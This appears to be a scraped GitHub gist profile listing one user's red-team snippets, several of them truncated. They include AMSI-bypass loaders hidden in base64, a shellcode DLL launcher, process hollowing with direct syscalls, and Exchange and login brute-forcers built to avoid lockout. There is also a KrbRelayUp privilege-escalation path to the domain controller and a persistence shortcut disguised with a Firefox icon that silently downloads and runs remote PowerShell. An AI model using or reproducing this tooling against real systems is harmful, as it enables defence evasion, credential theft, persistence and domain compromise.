Skip to content

Instantly share code, notes, and snippets.

View aniqfakhrul's full-sized avatar

Aniq Fauzi aniqfakhrul

129 followers · 36 following
View GitHub Profile
@aniqfakhrul
aniqfakhrul / xor-enc-dec.py
Created November 16, 2022 01:21
XOR Encryption Decryption with python
# Red Team Operator course code template
# payload encryption with XOR
#
# author: reenz0h (twitter: @sektor7net)
import sys
from itertools import cycle
key = bytearray("jisjidpa123","utf8")
filename = "LSASS_DECRYPTED.DMP"
@aniqfakhrul
aniqfakhrul / README.md
Last active March 21, 2024 08:56
Local Workstation to DC

From Local Workstation to DC

This exploit path will only imply if you have an interactive session on a domain joined workstation regardless the privilege of the account (it could be a low privileged account)

  1. Obtain system certificate for the current workstation
KrbRelayUp.exe relay -m shadowcred -f
  1. Get the certificate and certificate password.
@aniqfakhrul
aniqfakhrul / asb_path_morse.ps1
Created August 29, 2021 06:59
RastaMourse's AmsiScanBuffer with Morse Code implementation
$blob = "dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CnB1YmxpYyBjbGFzcyBXaW4zMiB7CiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldFByb2NBZGRyZXNzKEludFB0ciBoTW9kdWxlLCBzdHJpbmcgcHJvY05hbWUpOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBWaXJ0dWFsUHJvdGVjdChJbnRQdHIgbHBBZGRyZXNzLCBVSW50UHRyIGR3U2l6ZSwgdWludCBmbE5ld1Byb3RlY3QsIG91dCB1aW50IGxwZmxPbGRQcm90ZWN0KTsKfQpwdWJsaWMgY2xhc3MgcmFoc2lhCnsKICAgICAgICBwdWJsaWMgc3RhdGljIHN0cmluZyBkZWMoc3RyaW5nIGVuY29kZWQpCiAgICAgICAgewogICAgICAgICAgICBjaGFyW10gdGV4dCA9IHsgJ2EnLCAnQScsICdiJywgJ0InLCAnYycsICdDJywgJ2QnLCAnRCcsICdlJywgJ0UnLCAnZicsICdGJywgJ2cnLCAnRycsICdoJywgJ0gnLCAnaScsICdJJywgJ2onLCAnSicsICdrJywgJ0snLCAnbCcsICdMJywgJ20nLCAnTScsICduJywgJ04nLCAnbycsICdPJywgJ3AnLCAnUCcsICdxJywgJ1EnLCAncicsICdSJywgJ3MnLCAnUycsICd0JywgJ1QnLCAndScsICdVJywgJ3YnLCAnVicsICd3JywgJ1cnLCA
@aniqfakhrul
aniqfakhrul / owa_user_brute.py
Created August 24, 2021 05:08
Exchange brute force based on response time
#!/usr/bin/env python3
import requests
import sys
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import random
import string
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
hostname = "change hostname or ip"
@aniqfakhrul
aniqfakhrul / dlllauncher.cs
Created July 7, 2021 04:21
DLL Shellcode Launcher with MSBuild export
//execute with
//msiexec.exe /z C:\Users\ch4rm\Desktop\ObfuscatorXOR\Dlllauncher\bin\x64\Release\Dlllauncher.dll
using System;
using RGiesecke.DllExport;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Security.Cryptography;
using System.IO;
@aniqfakhrul
aniqfakhrul / hollow_sc.cpp
Created June 24, 2021 08:24
Process Hollowing + Direct Syscalls
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "aes.hpp"
#include "base64.h"
#include "low.h"
#include <string>
#include <map>
#include <sstream>
@aniqfakhrul
aniqfakhrul / shortcut.ps1
Created June 12, 2021 16:17
Persistence: Shortcut
$WshShell = New-Object -ComObject WScript.Shell
$shortcut = $WshShell.CreateShortcut("C:\Users\REUSER\Desktop\firefoxx.lnk")
$shortcut.TargetPath = "powershell.exe"
$shortcut.Description = "Totally Notmal"
$shortcut.HotKey = "F6"
$shortcut.IconLocation = "C:\Program Files\Mozilla Firefox\firefox.exe"
$shortcut.Arguments = "-windowstyle hidden iex(iwr -usebasicparsing http://example.com/notmal.ps1)"
$shortcut.save()
@aniqfakhrul
aniqfakhrul / random_cap_brute.py
Created June 7, 2021 05:42
Account Block Bypass Login (bruteforce) with random capitalization
#!/usr/bin/env python3
import random
import requests
url = "http://localhost/index.php" # change to your target url
username = "administrator"
def randomize(s):
result = ''
for c in s:
@aniqfakhrul
aniqfakhrul / reflective.ps1
Created May 28, 2021 09:09
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
[SySTEM.TexT.EnCODING]::uNIcodE.getStriNG([sYsTEM.conVErt]::fROmBAsE64stRINg("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAUgBlAGYAbABlAGMAdABpAG8AbgAgAG0AZQB0AGgAbwBkACAAdwBpAHQAaAAgAFcATQBGADUAIABhAHUAdABvAGwAbwBnAGcAaQBuAGcAIABiAHkAcABhAHMAcwAgAAoAWwBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAKAAiAEYAdQBuAGMAYABgADMAWwBTAHQAcgBpAG4AZwAsACAAJAAoACgAWwBTAHQAcgBpAG4AZwBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAKAAnAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdADtAPUAbgAuAEIA7QBuAGQA7QBuAGcARgBsAOMAZwBzACcALgBuAG8AUgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACoAMgA0AC8AMgA0ACkAKwBbAEMAaABBAHIAXQAoADEAMQAxACsAMQA2AC0AMQA2ACkAKwBbAGMASABBAHIAXQAoADEANAArADEAMAAwACkAKwBbAEMAaABhAHIAXQAoADcAKwAxADAAMgApACsAWwBjAEgAQQBSAF0AKAA2ADgAKgA0ADMALwA0ADMAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBjAEgAYQBSAF0AKABbAEIAeQB0AEUAXQAwAHgANQBjACkAKwBbAEMAaABBAFIAXQAoAFsAQgB5AHQARQBdADAAeAA3ADAAKQArAFsAYwBoAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADcAYgApACsAWwBDAEgAQQBSAF0AKAA3ADcAKgAyADkALwAyADkAKQArAFsAYwBIAGEAcgBdACgAMQ
@aniqfakhrul
aniqfakhrul / APC_Injection.cs
Created May 28, 2021 09:01
Modified C# for process injection
//compile with
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;